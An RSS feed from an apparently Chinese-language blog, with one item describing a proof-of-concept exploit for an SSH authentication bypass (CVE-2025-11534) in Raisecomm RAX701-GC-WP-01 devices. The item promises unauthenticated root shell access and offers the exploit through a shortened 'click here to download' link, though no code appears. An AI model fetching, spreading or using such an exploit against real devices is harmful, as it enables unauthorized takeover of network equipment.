<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>SSH绕过 on 办公AI智能小助手</title>
    <link>https://blog.qife122.com/tags/ssh%E7%BB%95%E8%BF%87/</link>
    <description>Recent content in SSH绕过 on 办公AI智能小助手</description>
    <generator>Hugo</generator>
    <language>zh-cn</language>
    <copyright>qife</copyright>
    <lastBuildDate>Fri, 31 Oct 2025 11:10:34 +0800</lastBuildDate>
    <atom:link href="https://blog.qife122.com/tags/ssh%E7%BB%95%E8%BF%87/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Raisecomm设备SSH认证绕过漏洞利用详解</title>
      <link>https://blog.qife122.com/p/raisecomm%E8%AE%BE%E5%A4%87ssh%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%AF%A6%E8%A7%A3/</link>
      <pubDate>Fri, 31 Oct 2025 11:10:34 +0800</pubDate>
      <guid>https://blog.qife122.com/p/raisecomm%E8%AE%BE%E5%A4%87ssh%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%AF%A6%E8%A7%A3/</guid>
      <description>&lt;h1 id=&#34;raisecomm-rax701-gc-wp-01-ssh认证绕过漏洞利用cve-2025-11534&#34;&gt;Raisecomm RAX701-GC-WP-01 SSH认证绕过漏洞利用（CVE-2025-11534）&lt;/h1&gt;&#xA;&lt;h2 id=&#34;下载漏洞利用&#34;&gt;下载漏洞利用&lt;/h2&gt;&#xA;&lt;h3 id=&#34;点击此处下载&#34;&gt;&lt;a href=&#34;https://tinyurl.com/4wds3n32&#34;&gt;&lt;strong&gt;点击此处下载&lt;/strong&gt;&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;h2 id=&#34;概述&#34;&gt;概述&lt;/h2&gt;&#xA;&lt;p&gt;本仓库包含针对CVE-2025-11534的完整功能概念验证（PoC）漏洞利用，目标为运行固件版本5.5.27_20190111或更早版本的Raisecomm RAX701-GC-WP-01设备。该漏洞允许远程攻击者完全绕过SSH认证，无需凭据、用户交互或权限即可获得无限制的root shell访问权限。&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
